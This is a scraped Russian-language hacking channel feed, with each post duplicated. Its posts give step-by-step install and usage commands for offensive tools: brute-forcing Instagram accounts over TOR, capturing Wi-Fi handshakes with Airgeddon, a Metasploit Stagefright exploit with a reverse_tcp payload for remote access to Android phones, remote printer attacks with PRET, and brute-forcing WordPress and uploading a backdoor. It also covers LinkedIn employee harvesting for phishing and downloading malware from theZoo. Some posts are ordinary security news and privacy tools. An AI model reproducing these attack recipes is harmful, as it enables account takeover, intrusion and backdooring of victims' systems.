Сборник модулей для пентеста
Знание работы множества модулей для проведения атак и пентеста - это хорошо, но на использование и настройку каждого вручную может уйти много времени. Сэкономить его позволят автоматизированные сборники утилит. Они уже включают в себя все необходимые шаблоны, пользователю остается их только откорректировать под себя.
Самый популярный сборник из подобных - это Hakku. Он вмещает в себя модули для тестирования беспроводных сетей и веб приложений в основном.
Установка
Скачиваем пакет командой
◽
Переходим в директорию и запускаем скрипт установки
◽
◽
Использование
Запускаем фреймворк командой
◽
Чтобы получить список модулей, нужно выполнить
Знание работы множества модулей для проведения атак и пентеста - это хорошо, но на использование и настройку каждого вручную может уйти много времени. Сэкономить его позволят автоматизированные сборники утилит. Они уже включают в себя все необходимые шаблоны, пользователю остается их только откорректировать под себя.
Самый популярный сборник из подобных - это Hakku. Он вмещает в себя модули для тестирования беспроводных сетей и веб приложений в основном.
Установка
Скачиваем пакет командой
◽
git clone https://github.com/4shadoww/hakkuframeworkПереходим в директорию и запускаем скрипт установки
◽
cd hakkuframework/◽
./installИспользование
Запускаем фреймворк командой
◽
./hakkuЧтобы получить список модулей, нужно выполнить
show modules. С помощью help получаем справку по инструменту. Далее просто выбираем модуль, и также через help читаем, как им пользоваться.Брутфорс Instagram аккаунтов
Проблемы с атаками типа перебора у Instagram встречались часто. Как например, прошлогодняя уязвимость в восстановлении доступа. Она позволяла свободно подбирать нужный код активации обходя все блокировки социальной сети с помощью прокси. Как итог цена взлома абсолютно любого аккаунта находилась в районе 150$.
Стандартную атаку bruteforce также можно реализовать, даже за бесплатно. Для этого достаточно будет ApkSignature для аутентификаций и TOR для смены ip. Автоматизирует весь процесс эксплоит Instashell.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽
Переходим в директорию и ставим права на исполняемый файл
◽
◽
Использование
Запускаем сервисы TOR командой
◽
Запускаем Instashell
◽
Далее нужно ввести никнейм Instagram аккаунта и словарь паролей для перебора. Словари, в свою очередь, часто генерируются на основе собранной информации о пользователе. Как итог при нахождении подходящего пароля, скрипт остановит свою работу.
Проблемы с атаками типа перебора у Instagram встречались часто. Как например, прошлогодняя уязвимость в восстановлении доступа. Она позволяла свободно подбирать нужный код активации обходя все блокировки социальной сети с помощью прокси. Как итог цена взлома абсолютно любого аккаунта находилась в районе 150$.
Стандартную атаку bruteforce также можно реализовать, даже за бесплатно. Для этого достаточно будет ApkSignature для аутентификаций и TOR для смены ip. Автоматизирует весь процесс эксплоит Instashell.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽
git clone https://github.com/thelinuxchoice/instashellПереходим в директорию и ставим права на исполняемый файл
◽
cd instashell◽
chmod +x instashell.shИспользование
Запускаем сервисы TOR командой
◽
service tor startЗапускаем Instashell
◽
./instashell.shДалее нужно ввести никнейм Instagram аккаунта и словарь паролей для перебора. Словари, в свою очередь, часто генерируются на основе собранной информации о пользователе. Как итог при нахождении подходящего пароля, скрипт остановит свою работу.
Ошибка в Firefox позволяет взломать телефон через Wi-Fi
Mozilla попросила пользователей Firefox на Android срочно обновить браузер. Они нашли ошибку, используя которую хакеры могут взломать устройство через Wi-Fi сеть и посещать вредоносные сайты.
Mozilla исправила ошибку, которую можно было использовать для того, чтобы контролировать все браузеры Firefox на Android в одной Wi-Fi-сети. Хакеры могут использовать профили и данные пользователей, а также переходить по вредоносным сайтам, таким как фишинговые страницы.
Как пояснил ИБ-эксперт Крис Моберли (Chris Moberly), обнаруживший уязвимость, проблема связана с протоколом обнаружения сервисов (Simple Service Discovery Protocol, SSDP) в браузере. Данный протокол используется для поиска устройств в той же сети для передачи или получения контента. При обнаружении устройства механизм SSDP получает доступ к XML файлу с конфигурацией устройства.
Эксплуатация уязвимости не требует взаимодействия с пользователем, проведения атаки «человек посередине» или установки вредоносного приложения. Для этого всего лишь нужно, чтобы на мобильном устройстве был установлен браузер Firefox.
Mozilla попросила пользователей Firefox на Android срочно обновить браузер. Они нашли ошибку, используя которую хакеры могут взломать устройство через Wi-Fi сеть и посещать вредоносные сайты.
Mozilla исправила ошибку, которую можно было использовать для того, чтобы контролировать все браузеры Firefox на Android в одной Wi-Fi-сети. Хакеры могут использовать профили и данные пользователей, а также переходить по вредоносным сайтам, таким как фишинговые страницы.
Как пояснил ИБ-эксперт Крис Моберли (Chris Moberly), обнаруживший уязвимость, проблема связана с протоколом обнаружения сервисов (Simple Service Discovery Protocol, SSDP) в браузере. Данный протокол используется для поиска устройств в той же сети для передачи или получения контента. При обнаружении устройства механизм SSDP получает доступ к XML файлу с конфигурацией устройства.
Эксплуатация уязвимости не требует взаимодействия с пользователем, проведения атаки «человек посередине» или установки вредоносного приложения. Для этого всего лишь нужно, чтобы на мобильном устройстве был установлен браузер Firefox.
Полуавтоматический взлом WiFi
Почти все уже знают о методе взлома WiFi с помощью перехвата и расшифровки хендшейка. Он реализуется утилитой aircrack и подразумевает использование довольно большого количества команд. Airgeddon автоматизирует этот процесс и позволяет перехватывать и расшифровывать хендшейк в пару кликов по клавиатуре.
Установка и использование
Устанавливаем Kali Linux.
Скачиваем репозиторий командой
◽
Переходим в директорию и запускаем скрипт
◽
◽
В случае наличия на ПК всех необходимых компонентов, Airgeddon предложит выбрать сетевую карту. Обычно она начинается на wlan. Вводим её номер и жмем Enter.
Использование
После запуска откроется главное меню. Управление утилитой в принципе сводится к вводу номера команды. Соответственно для базового перехвата хендшейка сначала нужно перевести карту в режим монитора прописав
Выбираем пункт "Explore for targets". Когда целей наберется достаточно нажимаем Ctrl-C. Далее нужно будет выбрать точку доступа только ту, у которой возле номера стоит звездочка, поскольку это означает, что к сети подключены другие пользователи.
Остается выбрать "Capture Handshake" и ввести команду
Далее можно перейти в главное меню и выбрать там под пунктом 6 оффлайн расшифровку хендшейка. Можно также воспользоваться онлайн ресурсами. Во всяком случае хендшейк перехвачен, без единой команды.
Почти все уже знают о методе взлома WiFi с помощью перехвата и расшифровки хендшейка. Он реализуется утилитой aircrack и подразумевает использование довольно большого количества команд. Airgeddon автоматизирует этот процесс и позволяет перехватывать и расшифровывать хендшейк в пару кликов по клавиатуре.
Установка и использование
Устанавливаем Kali Linux.
Скачиваем репозиторий командой
◽
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.gitПереходим в директорию и запускаем скрипт
◽
cd airgeddon/◽
sudo bash airgeddon.shВ случае наличия на ПК всех необходимых компонентов, Airgeddon предложит выбрать сетевую карту. Обычно она начинается на wlan. Вводим её номер и жмем Enter.
Использование
После запуска откроется главное меню. Управление утилитой в принципе сводится к вводу номера команды. Соответственно для базового перехвата хендшейка сначала нужно перевести карту в режим монитора прописав
2. Далее вводим 5, перейдя в раздел работы с хендшейками.Выбираем пункт "Explore for targets". Когда целей наберется достаточно нажимаем Ctrl-C. Далее нужно будет выбрать точку доступа только ту, у которой возле номера стоит звездочка, поскольку это означает, что к сети подключены другие пользователи.
Остается выбрать "Capture Handshake" и ввести команду
2. Откроется два окна и после перехвата хендшейка, он появится в одном из них. После нужно будет подтвердить перехват в главном окне с Airgeddon.Далее можно перейти в главное меню и выбрать там под пунктом 6 оффлайн расшифровку хендшейка. Можно также воспользоваться онлайн ресурсами. Во всяком случае хендшейк перехвачен, без единой команды.
База данных вредоносного ПО
theZoo - это open source проект направленный на предоставление возможности анализа различных вредоносных программ. В базе данных theZoo имеется около 300 вирусов, которые отсортированы по таким категориям, как операционная система, тип, язык программирования и т.д.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
Использование
Запускаем интерфейс командой
Далее можно выбрать из базы, к примеру, только ботнеты, прописав
Чтобы скачать нужный мальварь вписываем
Далее просто вводим
Базу данных можно обновлять командой
theZoo - это open source проект направленный на предоставление возможности анализа различных вредоносных программ. В базе данных theZoo имеется около 300 вирусов, которые отсортированы по таким категориям, как операционная система, тип, язык программирования и т.д.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
git clone https://github.com/ytisf/theZooИспользование
Запускаем интерфейс командой
python theZoo.pyДалее можно выбрать из базы, к примеру, только ботнеты, прописав
search botnetЧтобы скачать нужный мальварь вписываем
use <порядковый номер вируса в БД>Далее просто вводим
get и получаем архив с вредоносом и ключи для его расшифровки. В целях безопасности theZoo деактивирует вирусы путем шифрования.Базу данных можно обновлять командой
update-db. Более подробная справка доступна по команде help.Интерактивный блокировщик любых типов запросов браузера.
Создатели всеми известного блокировщика рекламы «uBlock Origin», разработали более функциональное расширение для браузеров, которое носит название «uMatrix». Его основной задачей является, предоставление пользователю полного контроля над загружаемыми веб-страницами и их контентом, посредством запрета загрузки скриптов, фреймов, CSS, рекламы и прочих возможностей.
По сравнению с другими расширениями, uMatrix отличается тем, что собрал в себе множество функций в одном, а так же он имеет более гибкую систему настроек. Так например, uMatrix позволяет устанавливать настройки как для глобального посещения, так и для определенного домена. Вы также можете проверить перечень сайтов, запрещённых на глобальном уровне и добавить в него свои. Стандартно для блокировки рекламы, трекеров и вредоносных загрузок используется 6 списков.
uMatrix позволяет активировать режим максимального блокирования, в котором отключаться всевозможные трекеры и вредоносные загрузки. А так же, блокируется все, кроме изображений и стилей CSS. Это увеличивает конфиденциальность, безопасность и экономит сетевой трафик. При его работе, могут возникать проблемы рендеринга некоторых ресурсов и ошибки взаимодействия.
Интерфейс, хоть и кажется сложным, но на деле является легко осваиваемым. В нем перечислены все входящие соединения посещаемой веб-страницы, а так же типы данных, которые блокируются и загружаются. Зеленым цветом указывается загруженное содержимое, красным — заблокированное. Чтобы разрешить или запретить определенный тип данных, например Media, нужно нажать на заголовок.
📌 Google Chrome - ссылка
📌 Mozilla Firefox - ссылка
📌 Opera - ссылка
#расширения #приватность #безопасность
Создатели всеми известного блокировщика рекламы «uBlock Origin», разработали более функциональное расширение для браузеров, которое носит название «uMatrix». Его основной задачей является, предоставление пользователю полного контроля над загружаемыми веб-страницами и их контентом, посредством запрета загрузки скриптов, фреймов, CSS, рекламы и прочих возможностей.
По сравнению с другими расширениями, uMatrix отличается тем, что собрал в себе множество функций в одном, а так же он имеет более гибкую систему настроек. Так например, uMatrix позволяет устанавливать настройки как для глобального посещения, так и для определенного домена. Вы также можете проверить перечень сайтов, запрещённых на глобальном уровне и добавить в него свои. Стандартно для блокировки рекламы, трекеров и вредоносных загрузок используется 6 списков.
uMatrix позволяет активировать режим максимального блокирования, в котором отключаться всевозможные трекеры и вредоносные загрузки. А так же, блокируется все, кроме изображений и стилей CSS. Это увеличивает конфиденциальность, безопасность и экономит сетевой трафик. При его работе, могут возникать проблемы рендеринга некоторых ресурсов и ошибки взаимодействия.
Интерфейс, хоть и кажется сложным, но на деле является легко осваиваемым. В нем перечислены все входящие соединения посещаемой веб-страницы, а так же типы данных, которые блокируются и загружаются. Зеленым цветом указывается загруженное содержимое, красным — заблокированное. Чтобы разрешить или запретить определенный тип данных, например Media, нужно нажать на заголовок.
📌 Google Chrome - ссылка
📌 Mozilla Firefox - ссылка
📌 Opera - ссылка
#расширения #приватность #безопасность
Удаленный доступ к смартфону через ссылку
То что по ссылке можно реализовать несанкционированный удаленный доступ на ПК знают многие, но это же можно сделать и для смартфона на Android. Существует несколько подобных уязвимостей, одна из которых Stagefright. Она присутствует на относительно старых версиях Android, и эксплуатируется с помощью эксплоита в Metasploit.
Установка
Устанавливаем Kali Linux.
В случае если пакет Stagefright не предустановлен в Metasploit, скачиваем его и закидываем в папку с эксплоитами.
Использование
Открываем консоль командой
Далее подключаем сам эксплоит
То что по ссылке можно реализовать несанкционированный удаленный доступ на ПК знают многие, но это же можно сделать и для смартфона на Android. Существует несколько подобных уязвимостей, одна из которых Stagefright. Она присутствует на относительно старых версиях Android, и эксплуатируется с помощью эксплоита в Metasploit.
Установка
Устанавливаем Kali Linux.
В случае если пакет Stagefright не предустановлен в Metasploit, скачиваем его и закидываем в папку с эксплоитами.
Использование
Открываем консоль командой
Далее подключаем сам эксплоит
exploit/android/browser/stagefright_mp4_tx3g_64bitТеперь нужно будет последовательно прописать необходимые параметры
SRVHOST <ip>Остается только запустить скрипт
◽️set URIPATH /
◽️set PAYLOAD linux/armle/mettle/reverse_tcp
◽️set LHOST <ip>
◽️set VERBOSE true
-jВ окне появится ссылка, при переходе по которой откроется сессия для удаленного доступа.
Удаленный взлом принтера
Взлом принтера с целью подмены данных в печатаемом документе атака не популярная, но довольно неприятная. При правильной реализации может нарушиться целая система документооборота, что приведет к заморозке рабочего процесса фирмы.
Причиной данных атак являются сбои и ошибки в работе с PostScript, PJL и PCL. Эксплоит для эксплуатации подобных уязвимостей разработали в университете Бохума.
Установка
Устанавливаем Kali Linux.
Устанавливаем необходимые пакеты python
◽
Далее потребуется установить несколько модулей
◽
И скачать сам репозиторий с github
◽
Использование
Остается только вписать ip адрес на котором располагается целевой принтер и выбрать скриптовый язык
◽
Как итог установится сопряжение и атакующий сможет манипулировать устройством удаленно.
Взлом принтера с целью подмены данных в печатаемом документе атака не популярная, но довольно неприятная. При правильной реализации может нарушиться целая система документооборота, что приведет к заморозке рабочего процесса фирмы.
Причиной данных атак являются сбои и ошибки в работе с PostScript, PJL и PCL. Эксплоит для эксплуатации подобных уязвимостей разработали в университете Бохума.
Установка
Устанавливаем Kali Linux.
Устанавливаем необходимые пакеты python
◽
pip install colorama pysnmp win_unicode_consoleДалее потребуется установить несколько модулей
◽
apt-get install ghostscript imagemagickИ скачать сам репозиторий с github
◽
git clone https://github.com/RUB-NDS/PRETИспользование
Остается только вписать ip адрес на котором располагается целевой принтер и выбрать скриптовый язык
◽
./pret.py 192.168.0.1 psКак итог установится сопряжение и атакующий сможет манипулировать устройством удаленно.
Сбор информации об Instagram аккаунте
OSINT инструмент, с названием «Osi.ig», поможет в сборе дополнительной информации об учетной записи Instagram, которую обычно сложно обнаружить просто листая профиль.
В его возможности входит полный анализ профиля и предоставление общего списка всех характеристик. Например, таких как количество подписчиков и подписок, фотографии пользователя, подключена ли учетная запись к Facebook, является ли профиль бизнес-аккаунтом, дата регистрации, название бизнес-категории и остальные особенности, определенной учетной записи.
Установка
📌https://github.com/th3unkn0n/osi.ig
#OSINT
OSINT инструмент, с названием «Osi.ig», поможет в сборе дополнительной информации об учетной записи Instagram, которую обычно сложно обнаружить просто листая профиль.
В его возможности входит полный анализ профиля и предоставление общего списка всех характеристик. Например, таких как количество подписчиков и подписок, фотографии пользователя, подключена ли учетная запись к Facebook, является ли профиль бизнес-аккаунтом, дата регистрации, название бизнес-категории и остальные особенности, определенной учетной записи.
Установка
$ pkg install -y git
$ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig
$ chmod +x install.sh && ./install.sh
Использование$ python3 main.py -u username
Так же, Osi.ig позволяет собрать статистику всех, и наиболее часто используемых хештегов. Дополнительно, можно проанализировать все метки местоположений, временные метки, подписи, комментарии и ссылки на изображения.📌https://github.com/th3unkn0n/osi.ig
#OSINT
Брутфорс Wordpress и загрузка бекдора
CMS системы значительно упрощают создание и администрирование сайтов, однако не всегда являются безопасными. К примеру, при неправильной конфигурации или устаревшей версии автоматизированные эксплоиты могут легко взломать веб ресурс, что приведет к утечкам данных.
Реализация методов взлома основывается как на эксплуатации уязвимостей, так и на обычном брутфорсе, о котором сегодня пойдет речь. В качестве примера, для подбора паролей будем использовать WpForce, но получение доступа к аккаунту не всегда является конечной целью. Обычно взломщик дополнительно заливает на сервер бекдор для большего контроля, в этом нам поможет Yertle.
Установка
Скачиваем все программы одним репозиторием с github
◽
Также потребуется установить Python.
Использование
Запускаем атаку на сайт командой
◽
В случае успеха в консоль выведется логин и пароль. Далее на сайт можно подгрузить бекдор прописав
◽
Готово, тестовый веб ресурс взломан, а мы закрепились в системе и можем управлять каталогами, БД и т.д.
CMS системы значительно упрощают создание и администрирование сайтов, однако не всегда являются безопасными. К примеру, при неправильной конфигурации или устаревшей версии автоматизированные эксплоиты могут легко взломать веб ресурс, что приведет к утечкам данных.
Реализация методов взлома основывается как на эксплуатации уязвимостей, так и на обычном брутфорсе, о котором сегодня пойдет речь. В качестве примера, для подбора паролей будем использовать WpForce, но получение доступа к аккаунту не всегда является конечной целью. Обычно взломщик дополнительно заливает на сервер бекдор для большего контроля, в этом нам поможет Yertle.
Установка
Скачиваем все программы одним репозиторием с github
◽
git clone https://github.com/n00py/WPForce.gitТакже потребуется установить Python.
Использование
Запускаем атаку на сайт командой
◽
python wpforce.py -i <список логинов> -w <список паролей> -u <ссылка>В случае успеха в консоль выведется логин и пароль. Далее на сайт можно подгрузить бекдор прописав
◽
python yertle.py -u <логин> -p <пароль> -t <ссылка> --interactiveГотово, тестовый веб ресурс взломан, а мы закрепились в системе и можем управлять каталогами, БД и т.д.
Автоматический сбор информации о сотрудниках компании
Инструмент Raven автоматизирует процесс сбора информации с Linkedin о сотрудниках целевой компании. Можно построить целую цепочку личностей: директора, менеджеры, подчиненные и т.д. Эти данные могут стать основой как для проведения банальных фишинговых, так и для более глубоких атак с применением СИ.
Установка
Скачиваем программу с github
Переходим в директорию и запускаем установщик
Использование
Для вывода справки нужно вписать
Из представленной информации можно узнать, что минимальные данные, которые нужно знать о целевой компании - это её название и инициалы страны расположения.
То есть если мы хотим узнать о сотрудниках корпорации "Evil", которая находится в России, нужно будет вписать команду
После завершения работы скрипта в терминале появится список всех найденных сотрудников.
Инструмент Raven автоматизирует процесс сбора информации с Linkedin о сотрудниках целевой компании. Можно построить целую цепочку личностей: директора, менеджеры, подчиненные и т.д. Эти данные могут стать основой как для проведения банальных фишинговых, так и для более глубоких атак с применением СИ.
Установка
Скачиваем программу с github
git clone https://github.com/0x09AL/raven.gitПереходим в директорию и запускаем установщик
cd ravensh setup.shИспользование
Для вывода справки нужно вписать
python raven.pyИз представленной информации можно узнать, что минимальные данные, которые нужно знать о целевой компании - это её название и инициалы страны расположения.
То есть если мы хотим узнать о сотрудниках корпорации "Evil", которая находится в России, нужно будет вписать команду
python raven.py -c 'Evil' -s ruПосле завершения работы скрипта в терминале появится список всех найденных сотрудников.
Проверка почты на предмет взлома
Инструмент PwnedOrNot позволяет узнать была ли ваша почта скомпрометирована. Апеллируя к базе из сотен утечек, скрипт пытается найти предоставленный ему email, и в случае подтверждения выдает все возможные вариации паролей.
Установка
Помимо Kali Linux, PwnedOrNot работает также и на Termux. Рассмотрим сначала установку на Kali, для этого нужно скачать репозиторий. Прописываем
◽️
◽️
◽️
◽️
◽️
PwnedOrNot максимально прост в использовании. Для начала процесса проверки запускаем скрипт командой
◽️
#kali #хакинг
Инструмент PwnedOrNot позволяет узнать была ли ваша почта скомпрометирована. Апеллируя к базе из сотен утечек, скрипт пытается найти предоставленный ему email, и в случае подтверждения выдает все возможные вариации паролей.
Установка
Помимо Kali Linux, PwnedOrNot работает также и на Termux. Рассмотрим сначала установку на Kali, для этого нужно скачать репозиторий. Прописываем
◽️
git clone https://github.com/thewhiteh4t/pwnedOrNot.git
Далее устанавливаем необходимый модуль Python◽️
pip install cfscrape
Готово. Для Termux установим для начала Python и Git◽️
pkg install python2
◽️pkg install git
Далее необходимые модули◽️
pip2 install requests
◽️pip2 install cfscrape
И в итоге скачаем репозиторий с github◽️
git clone https://github.com/thewhiteh4t/pwnedOrNot.git
ИспользованиеPwnedOrNot максимально прост в использовании. Для начала процесса проверки запускаем скрипт командой
◽️
python pwnedornot.py
Это как для Kali, так и для Termux. Далее остается только ввести почту и ждать завершения процесса. Если поиск пройдет удачно, в терминале появится список паролей, которые могут быть связаны со сканируемым адресом.#kali #хакинг
Amazon представила собственную технологию распознавания ладони
Технология Amazon One считается перспективной: в компании уверены, что в будущем она выйдет за пределы розничной сети и будет использоваться для идентификации людей в офисных зданиях, на стадионах и т.д.
В отличие от сканеров отпечатков пальцев на смартфонах, технология Amazon One еще и бесконтактная. Она может распознать ладонь клиента с расстояния, сопоставить данные с учетной записью Amazon Prime и автоматически списать средства с уже привязанной к аккаунту кредитки.
Сейчас технологий доступна в двух магазинах Amazon Go в Сиэтле (штат Вашингтон). В этой торговой точке используется самообслуживание без кассиров. Посетителю потребуется зарегистрироваться при первом посещении в специальном приложении. В нем же указываются данные кредитной карты. Далее требуется следовать указаниям помощника. После синхронизации карты и ладони покупатель сможет заходить в магазины Сиэтла, просто подержав руку над устройством «около секунды».
«Мы считаем, что технология Amazon One имеет перспективы широкого применения за пределами наших розничных магазинов, поэтому мы также планируем предлагать её использование третьим сторонам, таким как торговые точки, стадионы и офисные центры», — сказал вице-президент по розничному бизнесу Amazon Дилип Кумар (Dilip Kumar).
«Распознавание ладони считается более конфиденциальным, чем некоторые биометрические альтернативы. Вы не можете определить личность человека, глядя на изображение его ладони», – пояснил вице-президент по физическому ретейлу Amazon Дилип Кумар.
Для платежа ладонью клиентам не нужна учетная запись Amazon, достаточно банковской карты и номера телефона. При желании пользователи в любой момент смогут удалить свои биометрические данные из базы компании.
Технология Amazon One считается перспективной: в компании уверены, что в будущем она выйдет за пределы розничной сети и будет использоваться для идентификации людей в офисных зданиях, на стадионах и т.д.
В отличие от сканеров отпечатков пальцев на смартфонах, технология Amazon One еще и бесконтактная. Она может распознать ладонь клиента с расстояния, сопоставить данные с учетной записью Amazon Prime и автоматически списать средства с уже привязанной к аккаунту кредитки.
Сейчас технологий доступна в двух магазинах Amazon Go в Сиэтле (штат Вашингтон). В этой торговой точке используется самообслуживание без кассиров. Посетителю потребуется зарегистрироваться при первом посещении в специальном приложении. В нем же указываются данные кредитной карты. Далее требуется следовать указаниям помощника. После синхронизации карты и ладони покупатель сможет заходить в магазины Сиэтла, просто подержав руку над устройством «около секунды».
«Мы считаем, что технология Amazon One имеет перспективы широкого применения за пределами наших розничных магазинов, поэтому мы также планируем предлагать её использование третьим сторонам, таким как торговые точки, стадионы и офисные центры», — сказал вице-президент по розничному бизнесу Amazon Дилип Кумар (Dilip Kumar).
«Распознавание ладони считается более конфиденциальным, чем некоторые биометрические альтернативы. Вы не можете определить личность человека, глядя на изображение его ладони», – пояснил вице-президент по физическому ретейлу Amazon Дилип Кумар.
Для платежа ладонью клиентам не нужна учетная запись Amazon, достаточно банковской карты и номера телефона. При желании пользователи в любой момент смогут удалить свои биометрические данные из базы компании.
Доступ к Termux по отпечатку пальца
Termux - приложение реализующее Linux-подобную среду взаимодействие с которой происходит посредством консоли без необходимости иметь root-права на устройстве. Некоторое количество интересных статей по Termux вы можете найти на нашем канале, введя хештег #termux
В случае, если у смартфона есть датчик отпечатка пальца его можно использовать как аутентификатор для Termux. Но данная функция работает только на поздних версиях Android и самого приложения.
Установка
Открыв новую сессию, для начала нужно обновить пакеты
◽️
◽️
◽️
Переходим в директорию с инструментами и ставим права на исполняемый файл
◽️
◽️
#termux #безопасность
Termux - приложение реализующее Linux-подобную среду взаимодействие с которой происходит посредством консоли без необходимости иметь root-права на устройстве. Некоторое количество интересных статей по Termux вы можете найти на нашем канале, введя хештег #termux
В случае, если у смартфона есть датчик отпечатка пальца его можно использовать как аутентификатор для Termux. Но данная функция работает только на поздних версиях Android и самого приложения.
Установка
Открыв новую сессию, для начала нужно обновить пакеты
◽️
pkg update upgrade -y
Далее установим git◽️
pkg install git
И скачаем само решение◽️
git clone https://github.com/MrAlpha786/termux-fingerprint-lock
НастройкаПереходим в директорию с инструментами и ставим права на исполняемый файл
◽️
cd termux-fingerprint-lock
◽️chmod u+x setup
Далее запускаем его◽️
bash setup
В процессе выполнения программы попросит прислонить палец к сенсору. Готово. Теперь при последующем входе в Термукс, для появления данных на экране нужно будет сначала просканировать отпечаток.#termux #безопасность
Эксперт Avast заставил кофемашину вымогать деньги
Мартин Хрон, исследователь в области кибербезопасности из компании Avast, провел эксперимент по взлому «умных» кофемашин и выяснил, что эти аппараты можно атаковать даже с помощью программы-вымогателя.
Как рассказал Хрон в своем блоге, он пытался взломать кофемашину без необходимости вторжения в сеть, к которой она подключена. Изучив принцип работы атакуемого устройства, он выяснил, что кофемашина также выполняля роль точки доступа Wi-Fi и устанавливала незащищенное подключение с управляющим приложением.
Затем эксперт изучил механизм обновления прошивки. Как и следовало ожидать, апдейты также не шифровались, не требовали никакой аутентификации и не задействовали даже элементарной подписи кода.
Тогда исследователь попытался создать вредоносно функционирующее устройство, зловредную деятельность которого можно остановить только после оплаты выкупа. Триггером для атаки выступало подключение кофемашины к Сети, вредоносный код выводил устройство из строя и требовал выкуп. Дополнительным стимулом для оплаты выступала особая функция, которую Хрон включил в свой код: кофемашина постоянно задействовала очень шумные кофемолку и водонагреватель.
Поскольку в этот момент находиться рядом с кофемашиной практически невозможно, у жертвы остается два выхода: выдернуть шнур из розетки или заплатить выкуп. Но если выбрать первый вариант, надо быть готовым к тому, что при повторном включении машина начнет с того, на чем закончила — будет сильно шуметь и требовать выкуп.
#новость
Мартин Хрон, исследователь в области кибербезопасности из компании Avast, провел эксперимент по взлому «умных» кофемашин и выяснил, что эти аппараты можно атаковать даже с помощью программы-вымогателя.
Как рассказал Хрон в своем блоге, он пытался взломать кофемашину без необходимости вторжения в сеть, к которой она подключена. Изучив принцип работы атакуемого устройства, он выяснил, что кофемашина также выполняля роль точки доступа Wi-Fi и устанавливала незащищенное подключение с управляющим приложением.
Затем эксперт изучил механизм обновления прошивки. Как и следовало ожидать, апдейты также не шифровались, не требовали никакой аутентификации и не задействовали даже элементарной подписи кода.
Тогда исследователь попытался создать вредоносно функционирующее устройство, зловредную деятельность которого можно остановить только после оплаты выкупа. Триггером для атаки выступало подключение кофемашины к Сети, вредоносный код выводил устройство из строя и требовал выкуп. Дополнительным стимулом для оплаты выступала особая функция, которую Хрон включил в свой код: кофемашина постоянно задействовала очень шумные кофемолку и водонагреватель.
Поскольку в этот момент находиться рядом с кофемашиной практически невозможно, у жертвы остается два выхода: выдернуть шнур из розетки или заплатить выкуп. Но если выбрать первый вариант, надо быть готовым к тому, что при повторном включении машина начнет с того, на чем закончила — будет сильно шуметь и требовать выкуп.
#новость
Сборник OSINT инструментов
Сборники инструментов предназначенных для определенного спектра атак давно стали основной составляющей базового набора для пентеста. Сюда можно добавить и фреймворк The Inspector, который включает в себя модули для получения информации о телефоне либо о домене, обхода CloudFlare и т.д.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽️
◽️
Запускаем The Inspector командой
◽️
#kali #OSINT
Сборники инструментов предназначенных для определенного спектра атак давно стали основной составляющей базового набора для пентеста. Сюда можно добавить и фреймворк The Inspector, который включает в себя модули для получения информации о телефоне либо о домене, обхода CloudFlare и т.д.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽️
git clone https://github.com/Moham3dRiahi/Th3inspector
Переходим в директорию с The Inspector, ставим права на установщик и запускаем его◽️
cd Th3inspector
◽️chmod +x install.sh && ./install.sh
ИспользованиеЗапускаем The Inspector командой
◽️
perl Th3inspector.pl
Теперь можно выбрать интересующую функцию, вписав её номер. К примеру для получения информации о сайте вводим 1 и потом домен. Как итог получаем списком данные геолокации хостера, ip и т.д.#kali #OSINT
Китайские хакеры похитили у пользователей Facebook $4 млн
На конференции по безопасности Virus Bulletin 2020 члены команды безопасности Facebook раскрыли подробную информацию об одной из самых сложных вредоносных кампаний, которая когда-либо была нацелена на пользователей Facebook. Киберпреступная группировка, получившая название SilentFade, с конца 2018 года по февраль 2019 года использовала вредоносы для покупки рекламы от имени взломанных пользователей.
Хотя активность группировки продолжалась лишь несколько месяцев, по данным Facebook, за это время мошенникам удалось лишить пользователей более 4 000 000 долларов США, и все эти средства были использованы для размещения вредоносной рекламы.
Такие объявления, как правило, ограничивались географическим регионом зараженного пользователя (чтобы ограничить их доступность и не привлекать лишнего внимания), и все строились по одинаковому шаблону. Так, хакеры использовали короткие URL и изображения знаменитостей, чтобы заманить пользователей на разные мошеннические сайты, торгующие сомнительными товарами, включая средства для похудания, кето-таблетки и многое другое.
По словам экспертов, преступники распространяли современную версию вредоноса SilentFade в комплекте с легитимным программным обеспечением, которое они предлагали для загрузки в интернете. Как только троян SilentFade попадал на устройство пользователя под управлением Windows, хакеры получали контроль над компьютером жертвы. Однако вместо того, чтобы злоупотреблять системой для более навязчивых операций, вредонос только заменял легитимные DLL-файлы в установках браузера вредоносными копиями, позволяя SilentFade контролировать браузер.
#новость
На конференции по безопасности Virus Bulletin 2020 члены команды безопасности Facebook раскрыли подробную информацию об одной из самых сложных вредоносных кампаний, которая когда-либо была нацелена на пользователей Facebook. Киберпреступная группировка, получившая название SilentFade, с конца 2018 года по февраль 2019 года использовала вредоносы для покупки рекламы от имени взломанных пользователей.
Хотя активность группировки продолжалась лишь несколько месяцев, по данным Facebook, за это время мошенникам удалось лишить пользователей более 4 000 000 долларов США, и все эти средства были использованы для размещения вредоносной рекламы.
Такие объявления, как правило, ограничивались географическим регионом зараженного пользователя (чтобы ограничить их доступность и не привлекать лишнего внимания), и все строились по одинаковому шаблону. Так, хакеры использовали короткие URL и изображения знаменитостей, чтобы заманить пользователей на разные мошеннические сайты, торгующие сомнительными товарами, включая средства для похудания, кето-таблетки и многое другое.
По словам экспертов, преступники распространяли современную версию вредоноса SilentFade в комплекте с легитимным программным обеспечением, которое они предлагали для загрузки в интернете. Как только троян SilentFade попадал на устройство пользователя под управлением Windows, хакеры получали контроль над компьютером жертвы. Однако вместо того, чтобы злоупотреблять системой для более навязчивых операций, вредонос только заменял легитимные DLL-файлы в установках браузера вредоносными копиями, позволяя SilentFade контролировать браузер.
#новость
Пропускаем весь трафик через Tor в Windows
Пропуск всего трафика через сеть Tor повысит безопасность и анонимность пользователя. Помимо этого, для любого браузера станут доступными сайты доменной зоны .onion.
Минусом данной процедуры является значительное уменьшение скорости интернета, что может привести к невозможности проводить прямые трансляции либо усложнит коммуникацию в том же Zoom, к примеру. Однако этот способ имеет место быть, особенно когда нужно анонимизировать некоторые фоновые процессы.
Установка всего необходимого
